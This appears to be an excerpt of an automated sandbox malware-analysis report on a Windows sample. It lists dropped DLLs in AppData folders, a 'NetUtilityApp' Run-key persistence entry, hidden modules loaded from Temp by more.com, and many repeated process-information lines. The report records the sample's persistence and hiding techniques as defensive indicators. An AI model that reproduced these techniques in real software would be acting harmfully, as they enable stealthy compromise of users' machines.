                    Source: libssl-1_1-x64.dll.1.drStatic PE information: section name: .00cfg
                    Source: opengl64.dll.1.drStatic PE information: section name: .uedbg
                    Source: opengl64.dll.1.drStatic PE information: section name: _RDATA
                    Source: Qt5Core.dll.1.drStatic PE information: section name: .qtmimed
                    Source: steam_api64.dll.1.drStatic PE information: section name: _RDATA
                    Source: vcruntime140.dll.1.drStatic PE information: section name: _RDATA
                    Source: CryptoPP530Fips64.dll.1.drStatic PE information: section name: TEXT
                    Source: libvlc.dll.1.drStatic PE information: section name: .buildid
                    Source: libvlc.dll.1.drStatic PE information: section name: /4
                    Source: libvlccore.dll.1.drStatic PE information: section name: .buildid
                    Source: libvlccore.dll.1.drStatic PE information: section name: /4
                    Source: ICQLiteShell.dll.1.drStatic PE information: section name: .orpc
                    Source: tradingnetworkingsockets.dll.1.drStatic PE information: section name: _RDATA
                    Source: madHcNet32.dll.1.drStatic PE information: section name: .didata
                    Source: libcrypto-1_1-x64.dll.4.drStatic PE information: section name: .00cfg
                    Source: libssl-1_1-x64.dll.4.drStatic PE information: section name: .00cfg
                    Source: Qt5Core.dll.4.drStatic PE information: section name: .qtmimed
                    Source: steam_api64.dll.4.drStatic PE information: section name: _RDATA
                    Source: vcruntime140.dll.4.drStatic PE information: section name: _RDATA
                    Source: ktb.8.drStatic PE information: section name: yicvgb
                    Source: accpl.12.drStatic PE information: section name: yicvgb
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1D861D0 push rbp; retf 7_2_00007FFBA1D861D3
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1D861D8 push rbp; retf 7_2_00007FFBA1D861E3
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1D861A8 push rbp; retf 7_2_00007FFBA1D861AB
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1D86118 push rbp; retf 7_2_00007FFBA1D8611B
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\libcrypto-1_1-x64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\opengl64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\vcruntime140_1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteSkinUtils.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bplJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\accplJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlc.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\Microsoft.VisualStudio.VsWebProtocolJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\updater\NvStWiz.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\vcl120.bplJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\Qt5Core.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQLiteShell.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\libssl-1_1-x64.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\msvcp140.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1049.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\StartupHelperJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\ktbJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\WinRar.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\msvcp140_1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQRT.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\libssl-1_1-x64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\unrar.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\config.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\libcrypto-1_1-x64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\Qt5Core.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\Qt5Network.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\Qt5Network.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\tradingnetworkingsockets.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\vcruntime140_1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\msvcp140.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\NvStWizJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlccore.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\steam_api64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\Register.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\steam_api64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1058.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\trading_api64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\msvcp140_1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteRes.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\config.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\updater\NvStWiz.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\Microsoft.VisualStudio.VsWebProtocolJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\NvStWizJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\StartupHelperJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bplJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\vcl120.bplJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\ktbJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\accplJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Found hidden mapped module (file has been removed from disk)
                    Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\KTB
                    Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\ACCPL
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
